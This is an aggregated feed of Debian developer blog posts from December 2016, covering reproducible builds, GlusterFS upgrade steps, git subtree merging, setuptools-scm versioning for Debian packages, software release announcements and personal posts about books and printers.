December 20, 2016

Reproducible builds folks

Reproducible Builds: week 86 in Stretch cycle

What happened in the Reproducible Builds effort between Sunday December 11 and Saturday December 17 2016:

Reproducible builds world summit

The 2nd Reproducible Builds World Summit was held in Berlin, Germany on December 13th-15th. The event was a great success with enthusiastic participation from an extremely diverse range of projects. Many thanks to our sponsors for making this event possible!

Reproducible Summit 2 in Berlin 2016

Whilst an in-depth report is forthcoming, the Guix project has already released its own report.

Media coverage

Reproducible work in other projects

Documentation update

A large number of revisions were made to the website during the summit, including re-structuring existing content and creating a concrete plan to move the wiki content to the website.

Elsewhere in Debian

  • Chris Lamb submitted a patch for dak to preserve .buildinfo files on the local ftp-master filesystem. This is a temporary measure to prevent some "historical" data loss; the files are currently being silently discarded.

Packages reviewed and fixed, and bugs filed

Chris Lamb:

Daniel Shahaf:

Reiner Herrmann:

Reviews of unreproducible packages

9 package reviews have been added, 19 have been updated and 17 have been removed this week, adding to our knowledge about identified issues.

3 issue types have been added:

One issue type was updated:

Weekly QA work

During our reproducibility testing, some FTBFS bugs have been detected and reported by:

  • Chris Lamb (9)

diffoscope development

reprotest development

trydiffoscope development

  • trydiffoscope was split from the main diffoscope repository by Chris Lamb so that the two projects can be released independently and so that trydiffoscope can more easily be available on PyPI. It also simplifies the diffoscope packaging.

  • trydiffoscope 64 was uploaded to unstable by Chris Lamb.

Misc.

This week's edition was written by Chris Lamb and reviewed by a bunch of Reproducible Builds folks on IRC and via email.

20 December, 2016 07:31PM

Mario Lang

Squarepusher's Shobaleader One

I was recently lucky enough to see one of my long-time favourite drum and bass artists live! Squarepusher! I have known and loved his music since the late 90s.

My girlfriend got us tickets for the Shobaleader One performance at Porgy & Bess in Vienna. It was fantastic! 90 minutes of high-energy jazz.

As a personal memory, I captured one of my favourite Squarepusher tracks, Cooper's World. This is another case of #unseenphotography.

While I am usually not very much into jazz, I like this fusion of dnb and jazz very much.

20 December, 2016 11:07AM by Mario Lang

Petter Reinholdtsen

Isenkram updated with a lot more hardware-package mappings

The Isenkram system, which I wrote two years ago to make it easier in Debian to find and install packages to get your hardware dongles working, is still going strong. It is a system to look up the hardware present on or connected to the current system, and map that hardware to Debian packages. This can be done either using the tools in isenkram-cli or using the user-space daemon in the isenkram package. The latter will notify you, when you insert new hardware, about what packages to install to get the dongle working. It will even provide a button to click on to ask packagekit to install the packages.

Here is a command-line example from my Thinkpad laptop:

% isenkram-lookup  
bluez
cheese
ethtool
fprintd
fprintd-demo
gkrellm-thinkbat
hdapsd
libpam-fprintd
pidgin-blinklight
thinkfan
tlp
tp-smapi-dkms
tp-smapi-source
tpb
%

It can also list the firmware package providing the firmware requested by the loaded kernel modules, which in my case is an empty list, because I have all the firmware my machine needs:

% /usr/sbin/isenkram-autoinstall-firmware -l
info: did not find any firmware files requested by loaded kernel modules.  exiting
%

The last few days I had a look at several of the around 250 packages in Debian with udev rules. These seem like good candidates to install when a given hardware dongle is inserted, and I found several that should be proposed by isenkram. I have not had time to check all of them, but am happy to report that there are now 97 packages mapped to hardware by Isenkram. 11 of these packages provide their hardware mapping using AppStream, while the rest are listed in the modaliases file provided in isenkram.

These are the packages with hardware mappings at the moment. The marked packages are also announcing their hardware support using AppStream, for everyone to use:

air-quality-sensor, alsa-firmware-loaders, argyll, array-info, avarice, avrdude, b43-fwcutter, bit-babbler, bluez, bluez-firmware, brltty, broadcom-sta-dkms, calibre, cgminer, cheese, colord, colorhug-client, dahdi-firmware-nonfree, dahdi-linux, dfu-util, dolphin-emu, ekeyd, ethtool, firmware-ipw2x00, fprintd, fprintd-demo, galileo, gkrellm-thinkbat, gphoto2, gpsbabel, gpsbabel-gui, gpsman, gpstrans, gqrx-sdr, gr-fcdproplus, gr-osmosdr, gtkpod, hackrf, hdapsd, hdmi2usb-udev, hpijs-ppds, hplip, ipw3945-source, ipw3945d, kde-config-tablet, kinect-audio-setup, libnxt, libpam-fprintd, lomoco, madwimax, minidisc-utils, mkgmap, msi-keyboard, mtkbabel, nbc, nqc, nut-hal-drivers, ola, open-vm-toolbox, open-vm-tools, openambit, pcgminer, pcmciautils, pcscd, pidgin-blinklight, printer-driver-splix, pymissile, python-nxt, qlandkartegt, qlandkartegt-garmin, rosegarden, rt2x00-source, sispmctl, soapysdr-module-hackrf, solaar, squeak-plugins-scratch, sunxi-tools, t2n, thinkfan, thinkfinger-tools, tlp, tp-smapi-dkms, tp-smapi-source, tpb, tucnak, uhd-host, usbmuxd, viking, virtualbox-ose-guest-x11, w1retap, xawtv, xserver-xorg-input-vmmouse, xserver-xorg-input-wacom, xserver-xorg-video-qxl, xserver-xorg-video-vmware, yubikey-personalization and zd1211-firmware

If you know of other packages, please let me know with a wishlist bug report against the isenkram-cli package, and ask the package maintainer to add AppStream metadata according to the guidelines to provide the information for everyone. In time, I hope to get rid of the isenkram specific hardware mapping and depend exclusively on AppStream.
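For reference, the AppStream way of announcing hardware support is a modalias entry in the package's metainfo file; a minimal sketch (the component id, name and modalias pattern here are made up) could look like this:

```xml
<?xml version="1.0" encoding="UTF-8"?>
<component>
  <id>org.example.somedriver</id>
  <name>Some driver</name>
  <!-- glob pattern matched against the modalias strings of present hardware -->
  <provides>
    <modalias>usb:v1130p0202d*</modalias>
  </provides>
</component>
```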

Note: the AppStream metadata for broadcom-sta-dkms matches too much hardware, suggesting the package should be installed with any Ethernet card. See bug #838735 for the details. I hope the maintainer finds time to address it soon. In the meantime I provide an override in isenkram.

20 December, 2016 10:55AM

Mario Lang

Upgrading GlusterFS from Wheezy to Stretch

We are about to upgrade one of our GlusterFS-based storage systems at work. Fortunately, I was worried that the upgrade procedure for the Debian packages had not been tested by the maintainers. It turns out I was right. Simply upgrading the packages without manual intervention will apparently render your GlusterFS server unusable.

Basic setup

I have only tested the most basic distributed GlusterFS setup. No replication whatsoever. We have two GlusterFS servers, storage1 and storage2. A peering between both has been established, and a very basic volume has been configured:

storage1:~# gluster
gluster> peer status
Number of Peers: 1

Hostname: storage2
Uuid: 2d22cc13-2252-4cf1-bfe9-3d27fa2fbc29
State: Peer in Cluster (Connected)
gluster> volume create data storage1:/srv/data storage2:/srv/data
...
gluster> volume start data
...
gluster> volume info

Volume Name: data
Type: Distribute
Volume ID: e2bd5767-4b33-4e57-9320-91ca76f52d56
Status: Started
Number of Bricks: 2
Transport-type: tcp
Bricks:
Brick1: storage1:/srv/data
Brick2: storage2:/srv/data

For the test setup, I populated the volume with a number of files.

Upgrading from Wheezy to Jessie

To be safe, stop the volume before you begin with the package upgrade:

gluster> volume stop data

And now perform your dist-upgrade.

After the upgrade, you will have to perform two manual clean ups. Both actions have to be performed on all storage servers.

/etc/glusterd is now /var/lib/glusterd

The package maintainers have apparently neglected to take care of this one. You need to copy the old configuration files over manually.

storage1:~# cd /var/lib/glusterd && cp -r /etc/glusterd/* .

Put volume-id in extended attribute

GlusterFS 3.5 requires the volume-id in an extended directory attribute. This is also not automatically handled during package upgrade.

storage1:~# vol=data
storage1:~# volid=$(grep volume-id /var/lib/glusterd/vols/$vol/info | cut -d= -f2 | sed 's/-//g')
storage1:~# setfattr -n trusted.glusterfs.volume-id -v 0x$volid /srv/data
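The extraction pipeline can be dry-run without a GlusterFS installation to convince yourself that the attribute value comes out right; the UUID below is the one from the volume info shown earlier:

```shell
# Simulate the volume-id line as found in /var/lib/glusterd/vols/$vol/info
volid_line="volume-id=e2bd5767-4b33-4e57-9320-91ca76f52d56"
# Take the value after '=' and strip the dashes, as in the command above
volid=$(echo "$volid_line" | cut -d= -f2 | sed 's/-//g')
# This is the value setfattr will store in trusted.glusterfs.volume-id
echo "0x$volid"
# prints: 0xe2bd57674b334e57932091ca76f52d56
```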

With these two steps performed on all GlusterFS servers, you should now be able to start and mount your volume again in Debian Jessie.

Do not forget to explicitly stop the volume again before continuing with the next upgrade step.

Upgrading from Jessie to Stretch

After you have dist-upgraded to Stretch, there is yet another manual step you have to take to convert the volume metadata to the new layout in GlusterFS 3.8. Make sure you have stopped your volumes and the GlusterFS server.

storage1:~# service glusterfs-server stop

Now run the following command:

storage1:~# glusterd --xlator-option *.upgrade=on -N

Now you should be ready to start your volume again:

storage1:~# service glusterfs-server start
storage1:~# gluster
gluster> volume start data

And mount it:

client:~# mount -t glusterfs storage1:/data /mnt

You should now be running GlusterFS 3.8 and your files should still all be there.

20 December, 2016 10:50AM by Mario Lang

Thorsten Glaser

How to use the subtree git merge strategy

This article might be perceived as a blatant ripoff of this Linux kernel document, but, on the contrary, it’s intended as an add-on, showing how to do a subtree merge (the multi-project merge strategy that’s actually doable in a heterogeneous group of developers, as opposed to subprojects, which many just can’t wrap their heads around) with contemporary git (“stupid content tracker”). Furthermore, the commands are reformatted to be easier to copy/paste.

To summarise: you’re on the top level of a checkout of the project into which the “other” project (Bproject) is to be merged. We wish to merge the top level of Bproject’s “master” branch as (newly created) subdirectory “dir-B” under the current project’s top level.

	$ git remote add --no-tags -f Bproject /path/to/B/.git
	$ git merge -s ours --allow-unrelated-histories --no-commit Bproject/master
	$ git read-tree -u --prefix=dir-B/ Bproject/master
	$ git commit -m 'Merge B project as our subdirectory dir-B'

	Later updates are easy:
	$ git pull -s subtree Bproject master
 

(mind the trailing slash after dir-B/ on the read-tree command!)

Besides reformatting, the use of --allow-unrelated-histories recently became necessary. --no-tags is also usually what you want, because tags are not namespaced like branches.
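To see the recipe end to end, here is a throwaway replay of the commands above in two freshly created repositories; all repository names, paths and file contents are made up for the demonstration:

```shell
set -e
tmp=$(mktemp -d)

# The "other" project that will become dir-B.
git -c init.defaultBranch=master init -q "$tmp/Bproject"
(cd "$tmp/Bproject" &&
 git config user.email [email protected] && git config user.name demo &&
 echo b-content >b.txt && git add b.txt && git commit -qm 'B initial')

# The main project.
git -c init.defaultBranch=master init -q "$tmp/Aproject"
cd "$tmp/Aproject"
git config user.email [email protected] && git config user.name demo
echo a-content >a.txt && git add a.txt && git commit -qm 'A initial'

# The four commands from the article:
git remote add --no-tags -f Bproject "$tmp/Bproject/.git"
git merge -s ours --allow-unrelated-histories --no-commit Bproject/master
git read-tree -u --prefix=dir-B/ Bproject/master
git commit -qm 'Merge B project as our subdirectory dir-B'

# B's history now lives under dir-B/ in A
cat dir-B/b.txt
# prints: b-content
```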

Another command you might find relevant is how to clean up orphaned remote branches:

	$ for x in $(git remote); do git remote prune "$x"; done
 

This command locally deletes all remote branches (those named “origin/foo”) that have been deleted on the remote side.

Update: Natureshadow wishes you to know that there is such a command as git subtree which can do similar things to the subtree merge strategy explained above, and several more related things. It does, however, need the præfix on every subsequent pull.

20 December, 2016 10:36AM by MirOS Developer tg ([email protected])

Mike Hommey

Announcing git-cinnabar 0.4.0 release candidate 2

Git-cinnabar is a git remote helper to interact with mercurial repositories. It allows cloning, pulling and pushing from/to remote mercurial repositories, using git.

Get it on github.

These release notes are also available on the git-cinnabar wiki.

What’s new since 0.4.0rc?

  • /!\ Warning /!\ If you have been using a version of the release branch between 0.4.0rc and 0.4.0rc2 (more precisely, in the range 0335aa1432bdb0a8b5bdbefa98f7c2cd95fc72d2^..0.4.0rc2^), and used git cinnabar download and run on Mac or Windows, please run git cinnabar download again with this version and then ensure your mercurial clones have not been corrupted by case-sensitivity issues by running git cinnabar fsck --manifests. If they contain sha1 mismatches, please reclone.
  • Updated git to 2.11.0 for cinnabar-helper
  • Improvements to the git cinnabar download command
  • Various small code cleanups
  • Improvement to the experimental support for pushing merges

20 December, 2016 09:06AM by glandium

December 19, 2016

Mike Gabriel

[Arctica Project] Release of nx-libs (version 3.5.99.3)

Introduction

NX is a software suite which implements very efficient compression of the X11 protocol. This increases performance when using X applications over a network, especially a slow one.

NX (v3) was originally developed by NoMachine and has been Free Software ever since. Since NoMachine obsoleted NX (v3) some time back in 2013/2014, maintenance has been continued by a versatile group of developers. The work on NX (v3) is being continued under the project name "nx-libs".

Release Announcement

On Monday, Dec 19th, version 3.5.99.3 of nx-libs has been released [1].

This release brings another major backport of libNX_X11 (to the status of X.org's libX11 1.6.4, i.e. latest HEAD) and also a major backport of the xtrans library (status of latest HEAD at X.org, as well). This big chunk of work has again been performed by Ulrich Sibiller. Thanks for your work on this.

This release is also the first version of nx-libs (v3) that has dropped nxcompext as a shared library. We discovered that shipping nxcompext as a shared library is a big design flaw, as it has to be built against header files private to the Xserver (namely, dix.h). Consequently, code from nxcompext was moved into the nxagent DDX [2].

Furthermore, we worked again and again on cleaning up the code base. We dropped various files from the Xserver code shipped in nx-libs and fixed various compiler warnings.

In the upstream ChangeLog you will find some more items around code clean-ups and .deb packaging, see the diff [3] on the ChangeLog file for details.

A very special and massive thanks to all major contributors, namely Ulrich Sibiller, Mihai Moldovan and Vadim Troshchinskiy. Well done!!! Also a special thanks to Vadim Troshchinskiy for fixing some regressions in nxcomp introduced by the Unix socketeering support.

Change Log

A list of recent changes (since 3.5.99.2) can be obtained from here.

Known Issues from 3.5.99.2 (solved in 3.5.99.3)

This version of nx-libs now works fine again with LDFLAGS / CFLAGS having the -pie / -fPIE hardening flags set.

Binary Builds

You can obtain binary builds of nx-libs for Debian (jessie, stretch, unstable) and Ubuntu (trusty, xenial) via these apt-URLs:

Our package server's archive key is: 0x98DE3101 (fingerprint: 7A49 CD37 EBAE 2501 B9B4 F7EA A868 0F55 98DE 3101). Use this command to make APT trust our package server:

 wget -qO - http://packages.arctica-project.org/archive.key | sudo apt-key add -

The nx-libs software project brings to you the binary packages nxproxy (client-side component) and nxagent (nx-X11 server, server-side component).

Ubuntu developers, please note: we have added nightly builds for Ubuntu latest to our build server. This has been Ubuntu 16.10 so far, but we will soon drop 16.10 support in nightly builds and add 17.04 support.

References

19 December, 2016 02:39PM by sunweaver

Norbert Preining

I. J. Parker – The Dragon Scroll

A very enthralling and entertaining crime story set in 11th-century Japan, the starting point of a series of novels around Sugawara Akitada (菅原 顕忠), a fictional official/scholar in the Heian period who solves several difficult cases using his great balance of knowledge and common sense.

Akitada is sent to the far north (nowadays around Chiba) to check what has happened to the last three tax convoys that never appeared in the capital. He pokes around and unravels an involved plot to overthrow law and order. A few love stories, dead ends, and lots of wandering around bring the story to a wild finish.

The first book in the Akitada series reads very smoothly and quickly, never boring. It gives nice views of the society as imagined by the (scholarly) author, and somehow manages to transfer the feeling of living in this era to the reader.

For those with an interest in crime stories and Japan, it is a very recommendable book.

19 December, 2016 11:32AM by Norbert Preining

Chris Lamb

10 years of Debian

Today marks the 10-year anniversary of my first contribution to Debian GNU/Linux.

I will not recount the full history here but my first experience with Debian was a happy accident. I had sent off for a 5-CD set of Red Hat from The Linux Emporium only to discover I lacked the required 12MB of RAM. Annoyed, I reached for the Debian "potato" CD that was included gratis in my order due to it being outdated at the time…

Fast-forwarding a few years, whilst my first contribution was trivial, it was Thomas Bushnell's infectious enthusiasm that led me to contribute more, eventually becoming a Google Summer of Code student under Daniel Baumann, and finally becoming an official Debian Developer in September 2008 with Thomas Viehmann as my Application Manager. (Some things may never change, however; I still struggle with the bug tracker's control@ interface.)


The response I got to my patch always reminds me of the irrational power of providing attribution. I've always liked to tell myself I'm above such vanities but perhaps the truly mature approach would be to accept that ego is part of the human condition and—as a community—take steps to avoid handicapping ourselves by underestimating the value of "trivialities" such as having one's name listed.

I've since been fascinated by the number of maintainers who do not attribute patches in changelogs, especially from newcomers or when the changes are non-trivial — a handful in particular have stung me fairly deeply.

I would certainly concede that it adds nothing technical and can even be distracting, but it seems a reasonable concession that dramatically increases the chance of future efforts or, frankly, is simply a kindly gesture of thanks and good will. Given our level of technical expertise, I fear we regularly suffer from not having sufficient empathy for newcomers or first-time users who lack the context or orientation that we possess.

Anyway, here's to another ten…

19 December, 2016 11:27AM

Hideki Yamane

considering package delta


From Android Developers Blog: Saving Data: Reducing the size of App Updates by 65%

We should consider providing delta packages, especially for update packages from security.debian.org, IMO.

19 December, 2016 05:06AM by Hideki Yamane ([email protected])

December 18, 2016

Jonathan McDowell

Timezones + static blog generation

So, it turns out when you move to static blog generation and do the generation on your laptop, which is usually in the timezone you’re currently physically located, it can cause URLs to change. Especially if you’re prone to blogging late at night, which can result in even just a shift to DST changing things. I’ve forced jekyll to UTC by adding timezone: 'UTC' to the config, and ensuring all the posts now have timezones for when they were written (a lot of the imported ones didn’t), so hopefully things should be stable from here on.
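For reference, the relevant bits look roughly like this (a sketch: `timezone` is a standard Jekyll configuration key; the date shown is made up):

```yaml
# _config.yml — generate the site in UTC, independent of the laptop's zone
timezone: 'UTC'

# and each post's front matter carries an explicit offset, e.g.:
# ---
# date: 2016-12-18 23:28:00 +0000
# ---
```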

18 December, 2016 11:28PM

Iustin Pop

Printer fun

Had some printer fun this week. It was fun in the sense that failure modes are interesting, not that there was much joy in the process.

My current document printer is an HP that I bought back in early 2008; soon 9 years old, that is. When I got the printer I was quite happy: it supports Postscript, it supports memory extension (which allowed me to go from the built-in 64MB to a whopping 320MB), it is networked and has automatic duplex. Not good for much more than document printing, but that it did well. I didn't print a lot on it (on average it was well below the recommended monthly limit), which might explain the total trouble-free operation, but I did change the toner cartridges a couple of times.

The current cartridges were running low for a while, but I didn't need to change them yet. As I printed a user manual at the beginning of the week (~300+ pages in total), I ran out of the black half-way through. Bought a new cartridge, installed it, and the first strange thing was that it still showed “Black empty - please replace”.

I powered the printer off and turned it on again (the miracle cure for all IT-related things), and things seemed OK, so I restarted printing. However, this time the printer would go through 20-30 pages and then get stuck in "Printing document" with the green LED blinking. Waited for 20 minutes, nothing. So cancel the job (from the printer), restart printing, all fine.

The next day I wanted to print a single page, and didn't manage to. Checked that the PDF is normal, checked an older PDF which I printed successfully before, nothing worked. Changed drivers, unseated & re-seated the extra memory, changed operating systems, nothing. Not even the built-in printer diagnostic pages were printing.

The internet was all over with "HP formatter issues"; apparently some HP printers had "green" (i.e. low-quality) soldering, and were failing after a while. But people were complaining about 1-2-4 years, not the 9 that my printer worked, and it was very suspicious that all the trouble started after my cartridge replacement. Or, more likely, due to the recent sudden increase in printing.

Given that formatter board fixes (bake in the oven for N minutes at a specific temperature to reflow the soldering) are temporary and that you can't find replacement parts for this printer, I started looking for a new printer. To my surprise (and dismay at the waste that capitalism produces), a new printer from a higher class was cheaper than replacing all 4 cartridges in my printer. So I had a 90% full black cartridge that I couldn't reuse, but I'd get a new printer for not much more.

Interestingly, in 9 years, the development was:

  • In the series of printers that I had (home office use), one can't get a Ethernet-only networked duplex printer; the M252 series has only an 'n' variant (Ethernet only, no duplex), or 'dw' variant (Ethernet, WiFi, Duplex); if one wants duplex but no WiFi, it's available only in the next series, the M452.
  • The CPU speeds increased 2-3× and memory capacity by 2-4×; however, memory or font expansion is no longer possible.
  • The M252 series still uses Fast Ethernet (which is enough and consumes less power), whereas the M452 series has Gigabit.
  • It seems the cartridges come in two different capacities, but basically colour laser printers still employ the same 4-colour cartridge set (compare to photo printers at 9+).
  • I did just a brief examination of the market, but for home use, it seems the recommendation is still HP for no-troubles use or other brands for cheaper costs. Of course it varies a lot in reviews, but this is what I understood from forums; maybe I'm biased.
  • There was no increase in real resolution; the native grid is still 600dpi (photo inkjet printers are also stuck at 360/720 native for a while), but the ImageRet software processing seems to have advanced (from what the white-papers say).
  • Print speed however has visibly increased; still the same 2-3× increase, but this is wall-clock speed increase, whereas the CPU/memory is less relevant.

I was however happy that one can still get OS-independent (Postscript), networked printers that are small enough for home use and don't (necessarily) come with WiFi.

However, one thing still bothered me: did I have such problems because the printer died of overwork at old age, or was it related to the cartridge change? So I start searching again, and I find a post on a forum (oh Google, why did you remove "forum search" and replace it with "language level"?) that details a hidden procedure to format the internal storage of the printer, exactly for my printer model, exactly for my symptoms. Huh, I will lose page count, but this is worth a try…

So I do press the required keys, I see the printer booting and saying "erasing…", then asking for language, which makes me happy because it seems the forum post was correct in one regard. I confirm English, the printer reboots once more, and then when it comes up it warns me: "Yellow cartridge is a non-HP original, please confirm". I get confused, and re-seat all cartridges, to no avail. Yellow is non-HP. Sigh, maybe that cartridge had something that confused the printer? When I visit its web page however, all cartridges except the newly installed black one are marked as Non-HP; this only means that I can't see their remaining toner level, but otherwise—the printer is restored back to life. I take the opportunity to also perform a firmware upgrade (only five years newer firmware, but still quite old), but this doesn't solve the Non-HP message.

The printer works now, and I'm left wondering: was this all a DRM-related failure, something like new cartridge chip which had some new code that confused the printer so bad it needed reformatting, at which point the old cartridge code is no longer supported (for whatever reason)? Was it just a fluke, unrelated to DRM? Was the problem that I powered off the printer soon after replacing the cartridge, while it was still doing “something” (e.g. preparing to do a calibration after the change)?

And another, more practical question: I have 3 cartridges to replace still; they were at 10% before this entire saga, and I'm not able to see their level anymore, but they'll get down to empty soon. The black cartridge in the printer is already at 77%, which is surprising as I didn't print that much. So should I replace the cartridges on what is a possibly fully functional, but also possibly a dying printer? Or buy a new one for slightly more, throwing out possibly good hardware?

Even though I understand the business reason behind it, I hate the whole concept of "the printer is free, you pay for the ink". Though in my case "free" didn't mean bad, as a lifetime of 9 years is good enough for a printer.

18 December, 2016 10:58PM

Daniel Stender

How to cheat setuptools-scm (Debian diary)

[2016-12-19: some additions]

This is another little issue from Python packaging for Debian, which I came across lately while packaging Bcolz, the compressed NumPy-based data container. Upstream uses setuptools-scm to determine the software’s version at build time from the source code management environment the code is in. This method is convenient for the upstream development because with it the version number doesn’t need to be hard-coded, and often people just forget to update that (and other version-carrying files like doc/conf.py) when a new version of a project is released.

setuptools-scm just needs to be hooked into setup.py to do its job, and in Bcolz the code goes like this:

setup(
    name="bcolz",
    use_scm_version={
        'version_scheme': 'guess-next-dev',
        'local_scheme': 'dirty-tag',
        'write_to': 'bcolz/version.py'
    },
    ...
)
The file the version number is written to is bcolz/version.py. This file isn’t in the upstream code revision nor in the tarball which was released by the upstream developers, it’s always generated during build time.

In Debian there is an error if you try to build a package from a source tree which contains files that aren’t found in the corresponding tarball, like cruft from a previous build, or if any files have changed – therefore every new package should also be test-built twice in a row in a non-chroot environment. Generally there are two ways to solve this: either you add the cruft to debian/clean, or you add the file, resp. a matching file pattern, to extend-diff-ignore in debian/source/options. Which method is the better one could be discussed; I generally use the clean option if something isn’t in the upstream tarball, and the source/options solution if something is already in the upstream tarball but gets changed during a build. This is related to your preferred Git procedures: if you remove a file which is in the upstream tarball, these removals have to be checked in separately, and that means every time a new upstream tarball is released – not very convenient. Another available option is to strip certain files from the upstream tarball by putting them on the Files-Excluded list in debian/copyright. By the way, the same complexity applies to egg-info/: that folder is shipped or not shipped in the upstream tarball, and files in that folder get changed during the build.
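For illustration, the two mechanisms side by side (the version.py entry matches this package; the egg-info pattern is a hypothetical example):

```
# debian/clean — generated during build, not present in the upstream tarball
bcolz/version.py

# debian/source/options — in the upstream tarball, but modified during build
extend-diff-ignore = "^bcolz\.egg-info/"
```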

When the source code is put into a Git environment for Debian packaging, there can be problems with the version number setuptools-scm comes up with. This Setuptools extension takes the current version from the latest Git tag when a version number is to be found there, and that’s all right. In Git environments for Debian packaging (like e.g. those of the Debian Science group, the Python groups and others) such a tag is available, as the commonly used upstream tags carry version numbers1. The problem is that the upstream version which Debian has2 sometimes doesn’t match the original upstream version number which is wanted for version in bcolz/version.py. For example, the suffix +ds is used if the upstream tarball has been stripped of prebuilt files or embedded convenience copies (as is the case with the Bcolz package, where c-blosc/ has been stripped because that’s built as another package), while the suffix +dfsg shows that non-DFSG-free software has been removed (which can’t be distributed through the main archive section). Thus, the version string for Bcolz which is found after the build of the current package (1.1.0+ds1-1) is 1.1.0+ds1:

# coding: utf-8
# file generated by setuptools_scm
# don't change, don't track in version control
version = '1.1.0+ds1'

But that’s not wanted because this version never has been released, but appears everywhere:

$ pip list | grep bcolz
bcolz (1.1.0+ds1)
$ python3 -c 'import bcolz; bcolz.print_versions()'
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
bcolz version:     1.1.0+ds1

There are several different ways to fix this. The one “with the crowbar” (as we say in German) is to patch use_scm_version out of setup.py, but if you don’t provide a version in exchange, the version number used by Setuptools is then 0.0.0. The upstream version could be hard-coded into the patch, but then the maintainer must not forget to update it manually, which is not very convenient. Plus, setup.py could change and the patch might then need to be unfuzzed – more work. Bad.

A patch could be spared by setting and exporting the SETUPTOOLS_SCM_PRETEND_VERSION environment variable for setuptools-scm in debian/rules, which is sometimes done, judging by the results for that string on Debian Code Search. But how to avoid hard-coding the version number here? The dpkg-dev package (pulled in by build-essential) ships a Makefile snippet /usr/share/dpkg/pkg-info.mk which can be included in debian/rules. It defines several variables useful for packaging, like DEB_SOURCE, which contains the source package name; they are extracted from debian/changelog. DEB_VERSION_UPSTREAM, which is also available through that, yields the upstream version without epoch and Debian revision, but it doesn’t get any finer-grained out of the box.

For a custom fix, a regular expression which removes the +... extensions (if present) from the bare upstream version string would be s/\+[^+]*//:

$ echo "1.1.0+ds1" | sed -e 's/\+[^+]*//'
1.1.0
$ echo "1.1.0" | sed -e 's/\+[^+]*//'
1.1.0
$ echo "1.1.0+dfsg12" | sed -e 's/\+[^+]*//'
1.1.0
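The same stripping can be sketched in Python with the re module, mirroring the sed expression above (the function name here is just illustrative):

```python
import re

def bare_upstream_version(debian_upstream):
    """Strip a Debian-specific '+ds'/'+dfsg' style suffix,
    like sed 's/\\+[^+]*//'."""
    return re.sub(r"\+[^+]*", "", debian_upstream)

print(bare_upstream_version("1.1.0+ds1"))     # 1.1.0
print(bare_upstream_version("1.1.0"))         # 1.1.0
print(bare_upstream_version("1.1.0+dfsg12"))  # 1.1.0
```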

With that, a custom variable VERSION_UPSTREAM can be set on top of DEB_VERSION_UPSTREAM (from pkg-info.mk) in debian/rules:

include /usr/share/dpkg/pkg-info.mk
VERSION_UPSTREAM = $(shell echo '$(DEB_VERSION_UPSTREAM)' | sed -e 's/\+[^+]*//')
export SETUPTOOLS_SCM_PRETEND_VERSION = $(VERSION_UPSTREAM)

Bam, that works (see the commit here):

# coding: utf-8
# file generated by setuptools_scm
# don't change, don't track in version control
version = '1.1.0'

In addition, I've seen that dh-python also takes care of SETUPTOOLS_SCM_PRETEND_VERSION since 2.20160609. The environment variable is set by the pybuild Debhelper build system if python{3,}-setuptools-scm is among the build-dependencies in debian/control. The Perl code for that is in dh/pybuild.pm. I think the version number string above comes from dh-python's pretended version, and not from any of the Git tags (which are currently debian/1.1.0+ds1-1 and upstream/1.1.0+ds1).


  1. For Git in Debian packaging, e.g. see the DEP-14 proposal (Recommended layout for Git packaging repositories): http://dep.debian.net/deps/dep14/ [return]
  2. Following the scheme for package versions “[epoch:]upstream_version[-debian-revision]” [return]

18 December, 2016 09:56PM

hackergotchi for Sean Whitton

Sean Whitton

progpoking

Programming by poking: why MIT stopped teaching SICP

Perhaps there is a case for CS programs keeping pace with workplace technological changes (in addition to developments in the academic field of CS), but it seems sad to deprive undergrads of deeper knowledge about language design.

18 December, 2016 09:34PM

hackergotchi for Dirk Eddelbuettel

Dirk Eddelbuettel

RcppArmadillo 0.7.600.1.0

armadillo image

Earlier this week, Conrad released Armadillo 7.600.1. The corresponding RcppArmadillo release 0.7.600.1.0 is now on CRAN and in Debian. This follows several rounds of testing at our end: a full reverse-dependency check of a pre-release version, followed by another full reverse-dependency check, which was of course followed by CRAN testing for two more days.

Armadillo is a powerful and expressive C++ template library for linear algebra, aiming towards a good balance between speed and ease of use, with a syntax deliberately close to Matlab. RcppArmadillo integrates this library with the R environment and language, and is widely used by (currently) 298 other packages on CRAN -- an increase of 24 just since the last CRAN release of 0.7.500.0.0 in October!

Changes in this release relative to the previous CRAN release 0.7.500.0.0 are as follows:

Changes in RcppArmadillo version 0.7.600.1.0 (2016-12-16)

  • Upgraded to Armadillo release 7.600.1 (Coup d'Etat Deluxe)

    • more accurate eigs_sym() and eigs_gen()

    • expanded floor(), ceil(), round(), trunc(), sign() to handle sparse matrices

    • added arg(), atan2(), hypot()

Changes in RcppArmadillo version 0.7.500.1.0 (2016-11-11)

  • Upgraded to Armadillo release 7.500.1

  • Small improvement to return value treatment

  • The sample.h extension was updated to the newer Armadillo interface. (Closes #111)

Courtesy of CRANberries, there is a diffstat report. More detailed information is on the RcppArmadillo page. Questions, comments etc should go to the rcpp-devel mailing list off the R-Forge page.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. Please report excessive re-aggregation in third-party for-profit settings.

18 December, 2016 02:44PM

Mike Gabriel

Free Your Phone, Free Yourself, Get Sponsored for your Work

TL;DR: This is a call to every FLOSS developer interested in working towards Free Software driven mobile phones, especially targeting the Fairphone 2. If your only show stopper is lack of development hardware or lack of financial support, please read on below.

As I see it, the Fairphone 2 will be (or already is) the FLOSS community platform on the mobile devices market. I regularly get word of people working on this or that OS port to the FP2 hardware platform. The combination of a hardware-wise sustainably maintained mobile phone platform and a Free (or sort-of-Free) operating system being ported to it makes the Fairphone 2 a really attractive device.

Personally, I run Sailfish OS on my Fairphone 2. Some weeks ago, I got contacted by one of my sponsors letting me know that he got involved in setting up an initiative that works on porting the Ubuntu Tablet/Phone OS to the FP2. That very project is in need of more developers. Possibly, it needs exactly YOU!!!

So, if you are a developer that meets one or more of the below requirements and are interested in working in a highly motivated team, please get in touch with the UT4FP [1] project (skill requirements taken from the UT4FP website):

  • Expert knowledge on Android Build System (AOSP / Cyanogenmod);
  • Experience in porting devices to Android;
  • Knowledge of build-up of systems like Ubuntu Touch, SailfishOS, Firefox OS;
  • Knowledge of or understanding the Ubuntu Touch build system and the available manifests: UBports, but also phablet.ubuntu.com;
  • Experience with Git / repo;
  • C/C++ experience for (potentially) customizing code;
  • Reverse engineering → debugging individual components on the basis of logcat, dmesg, syslog, strace (boot, graphics, camera, GPS, Wifi etc.);
  • Debugging build errors and adjusting (Android) Makefiles;
  • Building a devicetree or migrating an existing devicetree for the purpose of a successful build;
  • Knowing where to find which components. (i.e. GitHub, CAF, Vendortrees (blobs));
  • Knowing how to patch a kernel and how to port AppArmor;
